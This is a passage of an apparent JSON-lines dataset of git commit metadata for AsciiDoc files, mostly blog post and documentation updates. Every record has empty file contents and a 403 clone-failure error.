Alves\/elasticsearch,hechunwen\/elasticsearch,ThalaivaStars\/OrgRepo1,alexkuk\/elasticsearch,mrorii\/elast
icsearch,huanzhong\/elasticsearch,C-Bish\/elasticsearch,apepper\/elasticsearch,apepper\/elasticsearch,kevinkluge\/elasticsearch,sposam\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,huanzhong\/elasticsearch,AndreKR\/elasticsearch,Chhunlong\/elasticsearch,micpalmia\/elasticsearch,Liziyao\/elasticsearch,palecur\/elasticsearch,humandb\/elasticsearch,onegambler\/elasticsearch,nrkkalyan\/elasticsearch,caengcjd\/elasticsearch,salyh\/elasticsearch,abibell\/elasticsearch,xpandan\/elasticsearch,maddin2016\/elasticsearch,linglaiyao1314\/elasticsearch,zeroctu\/elasticsearch,mbrukman\/elasticsearch,franklanganke\/elasticsearch,nezirus\/elasticsearch,trangvh\/elasticsearch,geidies\/elasticsearch,codebunt\/elasticsearch,dongjoon-hyun\/elasticsearch,gmarz\/elasticsearch,wenpos\/elasticsearch,bestwpw\/elasticsearch,gmarz\/elasticsearch,hanswang\/elasticsearch,markllama\/elasticsearch,wangtuo\/elasticsearch,ajhalani\/elasticsearch,qwerty4030\/elasticsearch,davidvgalbraith\/elasticsearch,Microsoft\/elasticsearch,MetSystem\/elasticsearch,sjohnr\/elasticsearch,ESamir\/elasticsearch,Ansh90\/elasticsearch,lchennup\/elasticsearch,HarishAtGitHub\/elasticsearch,mute\/elasticsearch,lzo\/elasticsearch-1,IanvsPoplicola\/elasticsearch,feiqitian\/elasticsearch,i-am-Nathan\/elasticsearch,mkis-\/elasticsearch,rlugojr\/elasticsearch,elancom\/elasticsearch,jaynblue\/elasticsearch,YosuaMichael\/elasticsearch,Brijeshrpatel9\/elasticsearch,elancom\/elasticsearch,rento19962\/elasticsearch,jimhooker2002\/elasticsearch,ulkas\/elasticsearch,sscarduzio\/elasticsearch,kaneshin\/elasticsearch,vroyer\/elassandra,pablocastro\/elasticsearch,dantuffery\/elasticsearch,Flipkart\/elasticsearch,chrismwendt\/elasticsearch,avikurapati\/elasticsearch,schonfeld\/elasticsearch,sc0ttkclark\/elasticsearch,nrkkalyan\/elasticsearch,ivansun1010\/elasticsearch,Uiho\/elasticsearch,Stacey-Gammon\/elasticsearch,mnylen\/elasticsearch,palecur\/elasticsearch,sposam\/elasticsearch,LewayneNaidoo\/elasticsearch,mohit\/elasticsearch,alexkuk\/elasticsearch,mcku\/elasticsearch,marcuswr\/elasticsearch-dateline,jaynblue\/elasticsearch,ckclark\/elasticsearch,zhaocloud\/elasticsearch,winstonewert\/elasticsearch,dantuffery\/elasticsearch,ulkas\/elasticsearch,bawse\/elasticsearch,vroyer\/elasticassandra,weipinghe\/elasticsearch,schonfeld\/elasticsearch,golubev\/elasticsearch,Brijeshrpatel9\/elasticsearch,mjhennig\/elasticsearch,wangtuo\/elasticsearch,liweinan0423\/elasticsearch,vroyer\/elasticassandra,ThiagoGarciaAlves\/elasticsearch,Fsero\/elasticsearch,YosuaMichael\/elasticsearch,hanst\/elasticsearch,mute\/elasticsearch,ouyangkongtong\/elasticsearch,Chhunlong\/elasticsearch,Shepard1212\/elasticsearch,mohsinh\/elasticsearch,a2lin\/elasticsearch,codebunt\/elasticsearch,sjohnr\/elasticsearch,liweinan0423\/elasticsearch,HarishAtGitHub\/elasticsearch,wbowling\/elasticsearch,sc0ttkclark\/elasticsearch,Rygbee\/elasticsearch,strapdata\/elassandra-test,hanst\/elasticsearch,jimhooker2002\/elasticsearch,mnylen\/elasticsearch,humandb\/elasticsearch,YosuaMichael\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,drewr\/elasticsearch,combinatorist\/elasticsearch,kcompher\/elasticsearch,areek\/elasticsearch,khiraiwa\/elasticsearch,zhaocloud\/elasticsearch,bestwpw\/elasticsearch,yuy168\/elasticsearch,combinatorist\/elasticsearch,brandonkearby\/elasticsearch,girirajsharma\/elasticsearch,nrkkalyan\/elasticsearch,truemped\/elasticsearch,Chhunlong\/elasticsearch,lightslife\/elasticsearch,luiseduardohdbackup\/elasticsearch,xpandan\/elasticsearch,kimimj\/elasticsearch,ep
iserver\/elasticsearch,markharwood\/elasticsearch,SergVro\/elasticsearch,snikch\/elasticsearch,AndreKR\/elasticsearch,acchen97\/elasticsearch,Shekharrajak\/elasticsearch,iamjakob\/elasticsearch,linglaiyao1314\/elasticsearch,Shepard1212\/elasticsearch,nknize\/elasticsearch,chirilo\/elasticsearch,iamjakob\/elasticsearch,yuy168\/elasticsearch,wayeast\/elasticsearch,dataduke\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,sneivandt\/elasticsearch,sarwarbhuiyan\/elasticsearch,Chhunlong\/elasticsearch,andrejserafim\/elasticsearch,hanswang\/elasticsearch,anti-social\/elasticsearch,fooljohnny\/elasticsearch,KimTaehee\/elasticsearch,jprante\/elasticsearch,Microsoft\/elasticsearch,salyh\/elasticsearch,nilabhsagar\/elasticsearch,shreejay\/elasticsearch,thecocce\/elasticsearch,wimvds\/elasticsearch,yanjunh\/elasticsearch,himanshuag\/elasticsearch,javachengwc\/elasticsearch,likaiwalkman\/elasticsearch,thecocce\/elasticsearch,yynil\/elasticsearch,strapdata\/elassandra5-rc,lydonchandra\/elasticsearch,coding0011\/elasticsearch,EasonYi\/elasticsearch,mnylen\/elasticsearch,mm0\/elasticsearch,yanjunh\/elasticsearch,jango2015\/elasticsearch,tkssharma\/elasticsearch,hechunwen\/elasticsearch,peschlowp\/elasticsearch,dataduke\/elasticsearch,MisterAndersen\/elasticsearch,xpandan\/elasticsearch,Flipkart\/elasticsearch,scottsom\/elasticsearch,MaineC\/elasticsearch,hechunwen\/elasticsearch,JackyMai\/elasticsearch,girirajsharma\/elasticsearch,ricardocerq\/elasticsearch,VukDukic\/elasticsearch,micpalmia\/elasticsearch,lchennup\/elasticsearch,koxa29\/elasticsearch,likaiwalkman\/elasticsearch,likaiwalkman\/elasticsearch,nknize\/elasticsearch,khiraiwa\/elasticsearch,feiqitian\/elasticsearch,PhaedrusTheGreek\/elasticsearch,truemped\/elasticsearch,Siddartha07\/elasticsearch,tcucchietti\/elasticsearch,pritishppai\/elasticsearch,libosu\/elasticsearch,gmarz\/elasticsearch,18098924759\/elasticsearch,opendatasoft\/elasticsearch,alexkuk\/elasticsearch,peschlowp\/elasticsearch,abibell\/elasticsearch,milodky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,qwerty4030\/elasticsearch,Helen-Zhao\/elasticsearch,girirajsharma\/elasticsearch,Chhunlong\/elasticsearch,opendatasoft\/elasticsearch,milodky\/elasticsearch,wittyameta\/elasticsearch,chrismwendt\/elasticsearch,amaliujia\/elasticsearch,mrorii\/elasticsearch,jimczi\/elasticsearch,MaineC\/elasticsearch,NBSW\/elasticsearch,nezirus\/elasticsearch,Flipkart\/elasticsearch,beiske\/elasticsearch,obourgain\/elasticsearch,alexksikes\/elasticsearch,achow\/elasticsearch,Kakakakakku\/elasticsearch,milodky\/elasticsearch,kunallimaye\/elasticsearch,trangvh\/elasticsearch,sposam\/elasticsearch,karthikjaps\/elasticsearch,bawse\/elasticsearch,libosu\/elasticsearch,thecocce\/elasticsearch,Collaborne\/elasticsearch,diendt\/elasticsearch,hafkensite\/elasticsearch,kaneshin\/elasticsearch,Flipkart\/elasticsearch,JSCooke\/elasticsearch,fernandozhu\/elasticsearch,socialrank\/elasticsearch,iacdingping\/elasticsearch,sdauletau\/elasticsearch,MjAbuz\/elasticsearch,IanvsPoplicola\/elasticsearch,Ansh90\/elasticsearch,coding0011\/elasticsearch,kubum\/elasticsearch,mute\/elasticsearch,amaliujia\/elasticsearch,sarwarbhuiyan\/elasticsearch,infusionsoft\/elasticsearch,strapdata\/elassandra5-rc,elancom\/elasticsearch,amit-shar\/elasticsearch,truemped\/elasticsearch,clintongormley\/elasticsearch,jbertouch\/elasticsearch,ouyangkongtong\/elasticsearch,adrianbk\/elasticsearch,hanswang\/elasticsearch,polyfractal\/elasticsearch,umeshdangat\/elasticsearch,ckclark\/elasticsearch,queirozfcom\/elasticsearch,kimchy\/elasti
csearch,kingaj\/elasticsearch,hanst\/elasticsearch,kalimatas\/elasticsearch,vorce\/es-metrics,tkssharma\/elasticsearch,jw0201\/elastic,jw0201\/elastic,nrkkalyan\/elasticsearch,rajanm\/elasticsearch,geidies\/elasticsearch,combinatorist\/elasticsearch,nellicus\/elasticsearch,vrkansagara\/elasticsearch,petabytedata\/elasticsearch,kcompher\/elasticsearch,kenshin233\/elasticsearch,mgalushka\/elasticsearch,hafkensite\/elasticsearch,fekaputra\/elasticsearch,tebriel\/elasticsearch,lks21c\/elasticsearch,hydro2k\/elasticsearch,heng4fun\/elasticsearch,Liziyao\/elasticsearch,gmarz\/elasticsearch,boliza\/elasticsearch,jbertouch\/elasticsearch,javachengwc\/elasticsearch,xingguang2013\/elasticsearch,btiernay\/elasticsearch,phani546\/elasticsearch,strapdata\/elassandra5-rc,elasticdog\/elasticsearch,Liziyao\/elasticsearch,karthikjaps\/elasticsearch,glefloch\/elasticsearch,rhoml\/elasticsearch,Asimov4\/elasticsearch,elancom\/elasticsearch,nilabhsagar\/elasticsearch,pranavraman\/elasticsearch,kalimatas\/elasticsearch,snikch\/elasticsearch,xuzha\/elasticsearch,amit-shar\/elasticsearch,phani546\/elasticsearch,mmaracic\/elasticsearch,pablocastro\/elasticsearch,JackyMai\/elasticsearch,wuranbo\/elasticsearch,AshishThakur\/elasticsearch,caengcjd\/elasticsearch,geidies\/elasticsearch,sposam\/elasticsearch,StefanGor\/elasticsearch,wbowling\/elasticsearch,thecocce\/elasticsearch,mortonsykes\/elasticsearch,lchennup\/elasticsearch,lzo\/elasticsearch-1,easonC\/elasticsearch,LeoYao\/elasticsearch,aparo\/elasticsearch,wbowling\/elasticsearch,markwalkom\/elasticsearch,AshishThakur\/elasticsearch,naveenhooda2000\/elasticsearch,bestwpw\/elasticsearch,hirdesh2008\/elasticsearch,infusionsoft\/elasticsearch,ulkas\/elasticsearch,ivansun1010\/elasticsearch,yongminxia\/elasticsearch,vietlq\/elasticsearch,djschny\/elasticsearch,JackyMai\/elasticsearch,fubuki\/elasticsearch,iantruslove\/elasticsearch,alexshadow007\/elasticsearch,hirdesh2008\/elasticsearch,linglaiyao1314\/elasticsearch,ulkas\/elasticsearch,lmtwga\/elasticsearch,avikurapati\/elasticsearch,aglne\/elasticsearch,anti-social\/elasticsearch,diendt\/elasticsearch,vvcephei\/elasticsearch,lmtwga\/elasticsearch,Brijeshrpatel9\/elasticsearch,njlawton\/elasticsearch,nellicus\/elasticsearch,rhoml\/elasticsearch,marcuswr\/elasticsearch-dateline,anti-social\/elasticsearch,xpandan\/elasticsearch,strapdata\/elassandra-test,Asimov4\/elasticsearch,amit-shar\/elasticsearch,liweinan0423\/elasticsearch,kevinkluge\/elasticsearch,yuy168\/elasticsearch,MisterAndersen\/elasticsearch,ESamir\/elasticsearch,mjason3\/elasticsearch,Stacey-Gammon\/elasticsearch,tsohil\/elasticsearch,Charlesdong\/elasticsearch,markwalkom\/elasticsearch,kimimj\/elasticsearch,awislowski\/elasticsearch,sneivandt\/elasticsearch,alexshadow007\/elasticsearch,HarishAtGitHub\/elasticsearch,bawse\/elasticsearch,pranavraman\/elasticsearch,kalimatas\/elasticsearch,mjason3\/elasticsearch,Clairebi\/ElasticsearchClone,JSCooke\/elasticsearch,zhiqinghuang\/elasticsearch,Liziyao\/elasticsearch,robin13\/elasticsearch,kalburgimanjunath\/elasticsearch,acchen97\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,lydonchandra\/elasticsearch,mgalushka\/elasticsearch,golubev\/elasticsearch,mikemccand\/elasticsearch,aglne\/elasticsearch,zkidkid\/elasticsearch,alexbrasetvik\/elasticsearch,dataduke\/elasticsearch,areek\/elasticsearch,uschindler\/elasticsearch,wbowling\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,markharwood\/elasticsearch,iantruslove\/elasticsearch,drewr\/elasticsearch,jw0201\/elastic,mm0\/elasticsearc
h,naveenhooda2000\/elasticsearch,dongjoon-hyun\/elasticsearch,NBSW\/elasticsearch,uboness\/elasticsearch,hydro2k\/elasticsearch,wangtuo\/elasticsearch,btiernay\/elasticsearch,mcku\/elasticsearch,iacdingping\/elasticsearch,jeteve\/elasticsearch,lzo\/elasticsearch-1,yanjunh\/elasticsearch,hydro2k\/elasticsearch,PhaedrusTheGreek\/elasticsearch,MjAbuz\/elasticsearch,VukDukic\/elasticsearch,a2lin\/elasticsearch,brandonkearby\/elasticsearch,strapdata\/elassandra5-rc,markllama\/elasticsearch,Kakakakakku\/elasticsearch,iantruslove\/elasticsearch,dylan8902\/elasticsearch,Liziyao\/elasticsearch,Ansh90\/elasticsearch,KimTaehee\/elasticsearch,mmaracic\/elasticsearch,AleksKochev\/elasticsearch,sauravmondallive\/elasticsearch,andrewvc\/elasticsearch,LeoYao\/elasticsearch,drewr\/elasticsearch,JervyShi\/elasticsearch,hydro2k\/elasticsearch,zhiqinghuang\/elasticsearch,apepper\/elasticsearch,HarishAtGitHub\/elasticsearch,abibell\/elasticsearch,mute\/elasticsearch,18098924759\/elasticsearch,loconsolutions\/elasticsearch,alexbrasetvik\/elasticsearch,fekaputra\/elasticsearch,LewayneNaidoo\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,kingaj\/elasticsearch,mm0\/elasticsearch","old_file":"docs\/python\/index.asciidoc","new_file":"docs\/python\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0c2751880c5e019392fdc76574a10bef951a37b0","subject":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","message":"Update 2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebc50407fa457b461703644c6283cdd92af99662","subject":"Renamed '_posts\/2017-08-15-IDE-Faster-IDE.adoc' to '_posts\/2017-08-15-IDE.adoc'","message":"Renamed '_posts\/2017-08-15-IDE-Faster-IDE.adoc' to '_posts\/2017-08-15-IDE.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-08-15-IDE.adoc","new_file":"_posts\/2017-08-15-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"82675b37d3d8712767e0791220a07a9d15db1f7f","subject":"Update 2018-05-28-Gas.adoc","message":"Update 2018-05-28-Gas.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-28-Gas.adoc","new_file":"_posts\/2018-05-28-Gas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73340f45e6d389c68138cbe2c92f9b58f4b89489","subject":"Update 
2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","message":"Update 2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","new_file":"_posts\/2017-07-27-Understand-IE-Protect-Mode-amp-Local-Intranet-Zone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7e737cdd536116f640a4081715f4b0146e32270","subject":"add how to start cts as service doc","message":"add how to start cts as service doc\n","repos":"kylinsoong\/CustomizedTools,CustomizedTools\/CustomizedTools,kylinsoong\/CustomizedTools,kylinsoong\/CustomizedTools,CustomizedTools\/CustomizedTools,CustomizedTools\/CustomizedTools","old_file":"docs\/How_to_start_CustomizedTools_as_service.asciidoc","new_file":"docs\/How_to_start_CustomizedTools_as_service.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kylinsoong\/CustomizedTools.git\/': The requested URL returned error: 403\n","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"53744e26981f6d9a61d839e37f9eab956af67265","subject":"Proposal on bridging to external endpoints (#3134)","message":"Proposal on bridging to external endpoints (#3134)\n\n* Proposal on bridging to external endpoints\r\n\r\nIssue #3150 ","repos":"jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design\/proposals\/bridging_external.adoc","new_file":"documentation\/design\/proposals\/bridging_external.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"81816d3fcacee9547d36e56fe11503348793629b","subject":"Deleted 20161110-1232-showoff-zone-owo.adoc","message":"Deleted 20161110-1232-showoff-zone-owo.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"20161110-1232-showoff-zone-owo.adoc","new_file":"20161110-1232-showoff-zone-owo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0613b4c565391edc2629f0f9ef280127149135f","subject":"create post 4 Unique Gadgets You Didn't Know Existed...","message":"create post 4 Unique Gadgets You Didn't Know Existed...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-4-Unique-Gadgets-You-Didnt-Know-Existed....adoc","new_file":"_posts\/2018-02-26-4-Unique-Gadgets-You-Didnt-Know-Existed....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"561d84008fd890875dfa85512c38c60f9907b008","subject":"Update 2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","message":"Update 2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","new_file":"_posts\/2017-12-15-Episode-121-Switch-It-Up-With-Site-Visits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"253ff8a509af11ceced3ba02c6f11304e9d7d1e0","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f40664040311c690a1e3d8d4cfe71efd829f17c","subject":"y2b create post Is This The New Bluetooth Champion?","message":"y2b create post Is This The New Bluetooth Champion?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-12-13-Is-This-The-New-Bluetooth-Champion.adoc","new_file":"_posts\/2016-12-13-Is-This-The-New-Bluetooth-Champion.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2259eda5830d3af73dcb2c84d573865d630d5061","subject":"y2b create post This Mysterious Box Is Over 100lbs... What Could It Be?","message":"y2b create post This Mysterious Box Is Over 100lbs... 
What Could It Be?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-10-This-Mysterious-Box-Is-Over-100lbs-What-Could-It-Be.adoc","new_file":"_posts\/2017-03-10-This-Mysterious-Box-Is-Over-100lbs-What-Could-It-Be.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a915bdd069bffcffcd608e2648988740baf57966","subject":"Update 2016-12-07-Telecharger-une-video-avec-son-url.adoc","message":"Update 2016-12-07-Telecharger-une-video-avec-son-url.adoc","repos":"Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io,Mediashare\/Mediashare.github.io","old_file":"_posts\/2016-12-07-Telecharger-une-video-avec-son-url.adoc","new_file":"_posts\/2016-12-07-Telecharger-une-video-avec-son-url.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mediashare\/Mediashare.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b87fecbf0b81c870612631ae1d03b7d0591708e5","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/joke_on_us.adoc","new_file":"content\/writings\/joke_on_us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e8d5c2f456bb44a87df0ea7bba007561c40ecd6f","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea44e5551c9f2e853503585f6009ef520f6395c6","subject":"Update 2017-09-29-Code-Display.adoc","message":"Update 2017-09-29-Code-Display.adoc","repos":"koter84\/blog,koter84\/blog,koter84\/blog,koter84\/blog","old_file":"_posts\/2017-09-29-Code-Display.adoc","new_file":"_posts\/2017-09-29-Code-Display.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/koter84\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8fc1b0c1d78a237a756b0115421cbf1c62e30a9","subject":"Added Windows Google Drive client artifacts.","message":"Added Windows Google Drive client artifacts.\n","repos":"Onager\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,joachimmetz\/artifacts,ForensicArtifacts\/artifacts,Onager\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70b944571effeddd3c0b7d26e3ed7515f0ff733d","subject":"Update 2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-09-01-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe6038ce997540c646fa051c9eca81a2e7089244","subject":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","message":"Update 2017-01-27-Google-Apps-Script-De-W-B-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_file":"_posts\/2017-01-27-Google-Apps-Script-De-W-B-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"76bd0cf55d980ab598cb0a2135c09fe7327d3153","subject":"quickly document mapview-generate-charts","message":"quickly document mapview-generate-charts\n\nSigned-off-by: Ricky Elrod <3de8762d49a778edd8b1aa9f381ea5a9ccb62944@elrod.me>\n","repos":"noexc\/mapview,noexc\/mapview","old_file":"doc\/mapview-generate-charts.adoc","new_file":"doc\/mapview-generate-charts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/noexc\/mapview.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71bb09a075853a4a84633b44a832cf5b290cc8eb","subject":"Update 2016-02-21-Django-Learning.adoc","message":"Update 2016-02-21-Django-Learning.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2016-02-21-Django-Learning.adoc","new_file":"_posts\/2016-02-21-Django-Learning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b355471290dd47461154ba6cd90f0007ee67094","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"642efeca7a8b8d8849fd9ed75a14aef5d7e77ed2","subject":"Update 2017-03-17-073-Is-Released.adoc","message":"Update 
2017-03-17-073-Is-Released.adoc","repos":"HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2017-03-17-073-Is-Released.adoc","new_file":"_posts\/2017-03-17-073-Is-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b825c04bb61934f46f2b2fc9550a5ff1a7321f9","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 